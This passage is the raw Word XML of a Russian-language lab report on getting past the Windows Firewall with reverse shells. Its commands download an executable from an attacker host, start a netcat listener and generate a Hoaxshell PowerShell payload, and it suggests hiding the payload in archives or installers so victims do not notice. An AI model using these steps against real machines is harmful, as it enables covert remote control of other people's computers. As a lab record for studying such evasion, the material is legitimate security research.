          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072F7B54" w14:textId="77777777" w:rsidR="003C062F" w:rsidRDefault="003C062F" w:rsidP="003C062F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>python3 -m http.server 80</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439B079A" w14:textId="77777777" w:rsidR="003C062F" w:rsidRPr="00404924" w:rsidRDefault="003C062F" w:rsidP="00404924">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Теперь на машине </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> нужно получить этот файл, для этого воспользуемся командой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7F80BA" w14:textId="77777777" w:rsidR="003C062F" w:rsidRDefault="003C062F" w:rsidP="003C062F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">wget </w:t>
      </w:r>
      <w:r w:rsidR="00AE3AB6" w:rsidRPr="00AE3AB6">
        <w:t>http://192.168.0.192/file.exe -o file.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A3AFC" w14:textId="77777777" w:rsidR="00404924" w:rsidRDefault="00AE3AB6" w:rsidP="00404924">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В реальности такой файл предполагаемая жертва может получить пут</w:t>
      </w:r>
      <w:r w:rsidR="00F141E1">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ё</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>м скачивания какого-либо архива с приложением из интернета. Наш зараженный файл будет находиться среди множества других файлов чтобы его не было заметно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F35A019" w14:textId="77777777" w:rsidR="003C062F" w:rsidRDefault="00AE3AB6" w:rsidP="00404924">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Следующим шагом з</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3AB6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>апусти</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3AB6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> netcat listener на атакующей машине, чтобы получить reverse</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE3AB6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. Воспользуемся командой:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274BD505" w14:textId="77777777" w:rsidR="00AE3AB6" w:rsidRPr="004A292C" w:rsidRDefault="00AE3AB6" w:rsidP="00AE3AB6">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>nc -nvlp 443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2337F6E9" w14:textId="77777777" w:rsidR="004A292C" w:rsidRPr="00404924" w:rsidRDefault="004A292C" w:rsidP="00404924">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Осталось запустить на машине </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> наш скачанный </w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">После запуска мы увидим успешный взлом и успешный доступ к </w:t>
      </w:r>
      <w:r>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00404924">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3508172C" w14:textId="77777777" w:rsidR="004A292C" w:rsidRDefault="004A292C" w:rsidP="004A292C">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4B129ED5" wp14:editId="246421EE">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="11950951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095183" name="Рисунок 1195095183"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId5">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126DB440" w14:textId="77777777" w:rsidR="004A292C" w:rsidRDefault="004A292C" w:rsidP="004A292C">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Рисунок \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D1167E">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Успешны</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>й</w:t>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="004A292C">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reverse-shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A8B6BF" w14:textId="77777777" w:rsidR="00306B56" w:rsidRPr="009E7151" w:rsidRDefault="00306B56" w:rsidP="009E7151">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7151">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">способ: </w:t>
      </w:r>
      <w:r w:rsidRPr="009E7151">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Обход с помощью </w:t>
      </w:r>
      <w:r>
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="009E7151">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="009E7151">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="009E7151">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04777969" w14:textId="77777777" w:rsidR="009E7151" w:rsidRPr="009E7151" w:rsidRDefault="009E7151" w:rsidP="009E7151">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:ind w:left="0" w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7151">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Сначала воспользуемся git clone для клонирования репозитория Hoaxshell с GitHub. Затем перейдем в директорию Hoaxshell и воспользуемся pip3 install -r requirements.txt для установки необходимых Python пакетов. Теперь сделаем Hoaxshell скрипт исполняемым, для этого используем команду: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76795136" w14:textId="77777777" w:rsidR="00306B56" w:rsidRDefault="009E7151" w:rsidP="009E7151">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009E7151">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>chmod +x hoaxshell.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D7AEE" w14:textId="77777777" w:rsidR="00024DCA" w:rsidRPr="00024DCA" w:rsidRDefault="00024DCA" w:rsidP="00024DCA">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024DCA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Запустим Hoaxshell скрипт и укажем локальный IP адрес, используя флаг -s </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D1CF1C" w14:textId="77777777" w:rsidR="00024DCA" w:rsidRDefault="00024DCA" w:rsidP="00024DCA">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00024DCA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>./hoaxshell.py -s 192.168.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00024DCA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A032610" w14:textId="77777777" w:rsidR="00C94873" w:rsidRDefault="00C94873" w:rsidP="00C94873">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C94873">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Hoaxshell выведет большую Powershell команду. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Копируем</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94873">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> эту команду целиком, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вставляем в </w:t>
      </w:r>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94873">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">на машине </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00C94873">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">и запускаем. В реальности такая команда может быть реализована внутри какого-либо установщика программы, предполагаемая </w:t>
      </w:r>
      <w:r w:rsidR="00FA4198">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>цель</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> может получить установщик путем скачивания его из интернета. Запустив установщик параллельно выполниться </w:t>
      </w:r>
      <w:r w:rsidR="00FA4198">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">вредоносная </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">команда, а </w:t>
      </w:r>
      <w:r w:rsidR="00FA4198">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>файрвол</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ничего не заметит.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D7F2D4" w14:textId="77777777" w:rsidR="005B6AB9" w:rsidRDefault="005B6AB9" w:rsidP="00C94873">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">После запуска команды в </w:t>
      </w:r>
      <w:r>
        <w:t>powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">видим успешный взлом и </w:t>
      </w:r>
      <w:r>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>на атакующей машине.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388B7FA4" w14:textId="77777777" w:rsidR="005B6AB9" w:rsidRDefault="005B6AB9" w:rsidP="005B6AB9">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3076650E" wp14:editId="490F8966">
            <wp:extent cx="5943600" cy="3343275"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142731695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316953" name="Рисунок 1427316953"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId6">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5AAC7B23" w14:textId="77777777" w:rsidR="005B6AB9" w:rsidRPr="009B1A98" w:rsidRDefault="005B6AB9" w:rsidP="005B6AB9">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C0330B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00C0330B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText>SEQ</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C0330B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> Рисунок \* </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:instrText>ARABIC</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00C0330B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D1167E" w:rsidRPr="00BE00F9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Успешный </w:t>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00C0330B">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="005B6AB9">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25FCCF46" w14:textId="77777777" w:rsidR="002E6B33" w:rsidRDefault="002E6B33" w:rsidP="002E6B33">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Результаты </w:t>
      </w:r>
      <w:r w:rsidR="009B1A98">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>исследования</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA876EF" w14:textId="77777777" w:rsidR="006647F8" w:rsidRDefault="006647F8" w:rsidP="006647F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Исследование включало запуск двух различных инструментов: </w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. В качестве контрольной точки рассматривалась успешность установки соединения с атакующей машиной, отсутствие предупреждений со стороны защитных механизмов межсет</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>евого экрана</w:t>
      </w:r>
      <w:r w:rsidRPr="006647F8">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и возможность выполнения удалённых команд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7AC1B" w14:textId="77777777" w:rsidR="002E6B33" w:rsidRDefault="005E3BA7" w:rsidP="006647F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В результате практического тестирования были подтверждены возможности обхода встроенного Windows </w:t>
      </w:r>
      <w:r>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> с использованием реверсивных оболочек.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C25643" w14:textId="77777777" w:rsidR="005E3BA7" w:rsidRDefault="005E3BA7" w:rsidP="006647F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E3BA7">
        <w:rPr>
